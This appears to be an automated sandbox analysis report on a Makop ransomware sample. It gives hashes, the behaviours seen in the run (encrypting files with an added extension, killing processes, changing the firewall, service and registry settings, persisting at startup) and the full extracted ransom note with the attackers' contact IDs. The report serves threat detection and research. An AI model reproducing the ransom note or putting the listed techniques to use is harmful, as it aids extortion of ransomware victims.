makop | 2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
81s
max time network
87s
platform
windows7_x64
resource
win7v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
Size

107KB
MD5

ffd507c308ffa09e21aa937bc631421a
SHA1

7938ce37df604cf807e9d2767acf33984a1776a3
SHA256

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409
SHA512

b48721c1e57152afe16576e7f54084e52d88d594c12203e5e56316bca8a7bc44c29b790e2e358ab0b7220b2d6e098a288b0fa602af84dda9cef16104f72d2970

Score

10^/10

makop discovery evasion ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Family

makop

Ransom Note

::: Greetings ::: Little FAQ: .1. Q: Whats Happen? A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen. .2. Q: How to recover files? A: If you wish to decrypt your files you will need to pay in Bitcoins. .3. Q: What about guarantees? A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee. .4. Q: How to contact with you? A: Please, write us to our qTOX account: 7BDD546F7524089A930B12F793F4C1D1B4470A15A4CBA85AA0DA6D030AFE2E48B8799204F004 You can learn about this way of communication and download it here: https://qtox.github.io/ Or use Bitmessage and write to our address: BM-2cUbGd124Dcs1Jdc5VfSa2GDMC1iaNTesC You can learn about this way of communication and download it here: https://wiki.bitmessage.org/ and here: https://github.com/Bitmessage/PyBitmessage/releases/ .5. Q: How will the decryption process proceed after payment? A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. .6. Q: If I don’t want to pay bad people like you? A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money. :::BEWARE::: DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data. Key Identifier: G5uSIqrXHFcaeqZZwri6skRdvIb/VMvUODWoLy4kMxo3WYL6X82rpz65SIZq3m68FoUDvbQpqBFbySMA5ilV376vNaqdNnWCJ0gaUwuXCr5dTC+YF0LvkntT7esI1UobUFQ8L/qDKkjzsvGdx249mMKcyNI/lGN0cQlrwAGXrh8vV5P8ToGhMlz2WUTHTZqzDfRIRS43EirDylKwe34BwvF+ttol871tIMcrGdIqjdgVdnsM+T6H/u/uzBj3l8WXLQEDSPyCxAkVoa0p3Wqnw4zLJAYclO3Hsu997OBNsIoLvoYK0CKTUQwZKmkOhBIzAp3FEKVtGGOfT6jkFBRmSGgREjpBIVKC4o2rdsQ9HAnYCYIBRsTkWlvmutoN1WdzJ7wupGQX9eHLCeo8PgbmLoF1hg6YGlRYZta+az8c03Ogjxi7tFu5h1VwFXrXXHFpaTFdpTeYbAv2BUspDgmnYsP0U7/dV9XVQ+QcIKK6JVaHqkwW50/rdU/WobLVyc3Kr7OBo1b2Ej6dtRVIthUWVlew19EMZ1bo0uHEb7flRvspEU3OmtbJ/ydKHG9DW81xczwh/im6zEVTy0rahy+eWTYhmO/O376yIm3Wud5gkJ7eOdyRLmV5Ic+mSHke0jyYVqEVxpEd3ehULTjnpNXDKZw2UHiO42PY39QA4uR02rY= PC Hardware ID: 40707513

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Family

makop

Ransom Note

Signatures

Makop
Ransomware family discovered by @VK_Intel in early 2020.
ransomware makop
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 1 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

Modifies file permissions 1 TTPs 3 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

1168 icacls.exe
1528 icacls.exe
580 icacls.exe

pid	process
1168	icacls.exe
1528	icacls.exe
580	icacls.exe

Drops file in Program Files directory 15 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

description	ioc	process
File opened for modification	C:\Program Files\ClearSuspend.mpv2.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Program Files\PopStart.M2T.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Program Files\AddGroup.rtf.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Program Files\MergeGet.inf.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Program Files\OptimizeRename.html.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Program Files\PublishHide.lock.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Program Files\RepairTrace.htm.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Program Files\SendReset.xps.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Program Files\TraceTest.contact.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Program Files\EnterGrant.xlsm.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Program Files\MountMerge.rle.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Program Files\SendSearch.mhtml.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Program Files\UnregisterRestore.ppt.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Program Files\UpdateCheckpoint.M2T.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Program Files\UpdateInvoke.vbs.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

Drops file in Windows directory 14 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

description	ioc	process
File created	C:\Windows\bootstat.dat.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\win.ini.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File created	C:\Windows\WindowsShell.Manifest.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\msdfmap.ini.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\PFRO.log.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\Starter.xml.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\system.ini.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\Professional.xml.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\setupact.log.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\TSSysprep.log.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File created	C:\Windows\RESTORE_FILES_INFO.txt	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\DtcInstall.log.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\WindowsShell.Manifest	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
File opened for modification	C:\Windows\WindowsUpdate.log.[ID-40707513].9ten0p	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1552	taskkill.exe
1164	taskkill.exe
336	taskkill.exe
1064	taskkill.exe
360	taskkill.exe
1356	taskkill.exe
944	taskkill.exe
1564	taskkill.exe
1560	taskkill.exe
112	taskkill.exe
1316	taskkill.exe
1740	taskkill.exe
316	taskkill.exe
1432	taskkill.exe
952	taskkill.exe
1688	taskkill.exe
1148	taskkill.exe
620	taskkill.exe
816	taskkill.exe
1448	taskkill.exe
1644	taskkill.exe
924	taskkill.exe
1988	taskkill.exe
1432	taskkill.exe
1536	taskkill.exe
1616	taskkill.exe
556	taskkill.exe
564	taskkill.exe
316	taskkill.exe
556	taskkill.exe
1992	taskkill.exe
1048	taskkill.exe
1524	taskkill.exe
980	taskkill.exe
956	taskkill.exe
1424	taskkill.exe
576	taskkill.exe
656	taskkill.exe
1760	taskkill.exe
1000	taskkill.exe
1692	taskkill.exe
784	taskkill.exe
960	taskkill.exe
904	taskkill.exe
2004	taskkill.exe
1660	taskkill.exe
2004	taskkill.exe
1284	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1484 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

2080 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2116 PING.EXE

pid	process
1484	reg.exe

pid	process
2080	notepad.exe

pid	process
2116	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

pid	process
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execonhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
Token: SeDebugPrivilege	1448	taskkill.exe
Token: SeDebugPrivilege	336	taskkill.exe
Token: SeDebugPrivilege	316	taskkill.exe
Token: SeDebugPrivilege	1316	taskkill.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeDebugPrivilege	2004	taskkill.exe
Token: SeDebugPrivilege	952	taskkill.exe
Token: SeDebugPrivilege	1432	taskkill.exe
Token: SeDebugPrivilege	1048	taskkill.exe
Token: SeDebugPrivilege	360	taskkill.exe
Token: SeDebugPrivilege	1740	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	556	taskkill.exe
Token: SeDebugPrivilege	1284	taskkill.exe
Token: SeDebugPrivilege	1000	taskkill.exe
Token: SeDebugPrivilege	1536	conhost.exe
Token: SeDebugPrivilege	784	taskkill.exe
Token: SeDebugPrivilege	1988	taskkill.exe
Token: SeDebugPrivilege	1064	taskkill.exe
Token: SeDebugPrivilege	1356	taskkill.exe
Token: SeDebugPrivilege	1616	taskkill.exe
Token: SeDebugPrivilege	944	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	1688	taskkill.exe
Token: SeDebugPrivilege	1992	taskkill.exe
Token: SeDebugPrivilege	1148	taskkill.exe
Token: SeDebugPrivilege	980	taskkill.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	1424	taskkill.exe
Token: SeDebugPrivilege	1432	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	960	taskkill.exe
Token: SeDebugPrivilege	112	taskkill.exe
Token: SeDebugPrivilege	904	taskkill.exe
Token: SeDebugPrivilege	2004	taskkill.exe
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeDebugPrivilege	620	taskkill.exe
Token: SeDebugPrivilege	556	taskkill.exe
Token: SeDebugPrivilege	576	taskkill.exe
Token: SeDebugPrivilege	316	taskkill.exe
Token: SeDebugPrivilege	656	taskkill.exe
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	816	taskkill.exe
Token: SeDebugPrivilege	564	taskkill.exe
Token: SeDebugPrivilege	924	taskkill.exe
Token: SeDebugPrivilege	1524	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

pid process

864 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

pid process

864 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe

description	pid	process	target process
PID 864 wrote to memory of 1448	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 864 wrote to memory of 1448	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 864 wrote to memory of 1448	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 864 wrote to memory of 1448	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	taskkill.exe
PID 864 wrote to memory of 1584	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	reg.exe
PID 864 wrote to memory of 1584	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	reg.exe
PID 864 wrote to memory of 1584	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	reg.exe
PID 864 wrote to memory of 1584	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	reg.exe
PID 864 wrote to memory of 1484	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	reg.exe
PID 864 wrote to memory of 1484	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	reg.exe
PID 864 wrote to memory of 1484	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	reg.exe
PID 864 wrote to memory of 1484	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	reg.exe
PID 864 wrote to memory of 1688	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	schtasks.exe
PID 864 wrote to memory of 1688	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	schtasks.exe
PID 864 wrote to memory of 1688	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	schtasks.exe
PID 864 wrote to memory of 1688	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	schtasks.exe
PID 864 wrote to memory of 816	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	cmd.exe
PID 864 wrote to memory of 816	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	cmd.exe
PID 864 wrote to memory of 816	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	cmd.exe
PID 864 wrote to memory of 816	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	cmd.exe
PID 864 wrote to memory of 1444	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	cmd.exe
PID 864 wrote to memory of 1444	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	cmd.exe
PID 864 wrote to memory of 1444	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	cmd.exe
PID 864 wrote to memory of 1444	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	cmd.exe
PID 864 wrote to memory of 752	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	netsh.exe
PID 864 wrote to memory of 752	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	netsh.exe
PID 864 wrote to memory of 752	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	netsh.exe
PID 864 wrote to memory of 752	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	netsh.exe
PID 864 wrote to memory of 1888	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	netsh.exe
PID 864 wrote to memory of 1888	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	netsh.exe
PID 864 wrote to memory of 1888	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	netsh.exe
PID 864 wrote to memory of 1888	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	netsh.exe
PID 864 wrote to memory of 1528	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 1528	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 1528	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 1528	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 792	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 792	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 792	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 792	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 1560	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 1560	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 1560	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 1560	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 1992	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 1992	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 1992	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 1992	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 912	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 912	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 912	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 912	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 960	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 960	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 960	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 960	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 580	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 580	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 580	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 580	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
PID 864 wrote to memory of 1092	864	714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe	sc.exe
